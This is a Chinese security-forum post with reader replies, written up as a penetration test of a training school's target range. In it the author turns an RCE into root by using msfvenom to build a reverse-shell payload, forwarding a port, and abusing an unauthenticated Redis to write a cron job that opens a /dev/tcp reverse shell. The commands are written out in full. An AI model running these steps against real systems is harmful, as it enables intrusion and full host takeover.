用户
搜索
  • TA的每日心情
    擦汗
    2019-10-30 09:18
  • 签到天数: 48 天

    连续签到: 1 天

    [LV.5]常住居民I

    版主

    QQ547006660~欢迎交流

    Rank: 7Rank: 7Rank: 7

    43

    主题

    146

    帖子

    6366

    魔法币
    收听
    0
    粉丝
    42
    注册时间
    2017-1-18

    秦春秋文阁春秋游侠核心白帽i春秋签约作者幽默灌水王积极活跃奖白帽高手

    J0o1ey 版主 QQ547006660~欢迎交流 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 白帽高手 楼主
    发表于 2019-7-19 18:31:12 84318
    本帖最后由 J0o1ey 于 2019-7-19 12:30 编辑

    0x00前言:

    渗透某安全培训学校在线靶场。不要听见靶场就关闭了此文,客官往下看。

    0x01开端

    打开此靶机各种琳琅满目的漏洞让我眼花缭乱,这里我选择一种直击要害的漏洞作为开端,R...C....E...


    人狠话不多,直接弹。

    收到shell权限较吊毛...就是个www
    .
    发现shell没有任何权限,无法对文件进行更改和写入。只能对上传目录有写入权限
    于是find -user www。

    上传目录通过web访问是没有权限访问的,访问uploads目录会直接跳转404页面。其实上传上PHP马也没什么卵用。

    内核打了一圈也没办法提权,像我也没得0day..哭廖。

    0x02信息搜集

    没办法不能走内核提权,就开始收集信息看看能不能进行环境变量,SUID,符号链接等提权。
    当我执行ps -fu root 命令时.眼前一亮
    root权限运行的redis卧槽有搞头,不过不能外连。

    0x003安排走起

    现在需要把6379端口转发出来,我决定用msf进行端口转发
    拿msf生成linux远控

    msfVENOM-p linux/x86/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=8000 -f elf >shell.elf

    但是问题又来了,目前的权限不能执行wget等远程下载操作。。
    这里我们通过上传漏洞将elf文件上传到服务器。


    我们CD到上传目录准备执行远控。
    ZxVvjK.png
    ZxVjc6.png
    msf配置好接受会话
    ZxZNbF.png

    接下来进行端口转发
    ZxZPNd.png

    ZxZi4A.png
    [hide]

    0x04漏洞利用

    nmap -A -p 6699 -script redis-info127.0.0.1  对其进行探测得知存在未授权。
    ZxZeu8.png
    ./redis-cli -h 127.0.0.1 -p 6699  //链接redis
    ZxZEgP.png
    我不准备写ssh的公私钥了,直接进行弹shell。
    本人亲测写ssh公私匙不稳定
    我们现在VPS上使用nc监听4445端口。
    ZxZVjf.png
    redis执行:

    set xxx "\n\n*/1 * * * */bin/bash -i>&/dev/tcp/ip/44440>&1\n\n"
    config set dir /var/spool/cron
    config setdbfilename root
    save

    ZxZk9I.png
    成功弹回root权限的shell~
    ZxZA3t.png
    欢迎各位大佬评论交流


    [/hide]
    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660交流群820783253
    发表于 2019-7-19 19:51:33
    谢谢分享linux的提权内容
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    J0o1ey 版主 QQ547006660~欢迎交流 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 白帽高手
    板凳
    发表于 2019-7-19 20:31:50
    Sir 7 发表于 2019-7-19 11:51
    谢谢分享linux的提权内容

    老哥,秒评牛逼
    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660交流群820783253
    使用道具 举报 回复
    发表于 2019-7-19 20:56:26
    J0o1ey 发表于 2019-7-19 20:31
    老哥,秒评牛逼

             
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    发表于 2019-7-20 02:17:12
    谢谢分享linux的提权内容
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2019-8-2 14:19:10
    ????
    使用道具 举报 回复
    发表于 2019-8-4 21:05:22
    ssh写公钥怎么写能告诉一下吗
    使用道具 举报 回复
    小白路过,膜拜大神
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册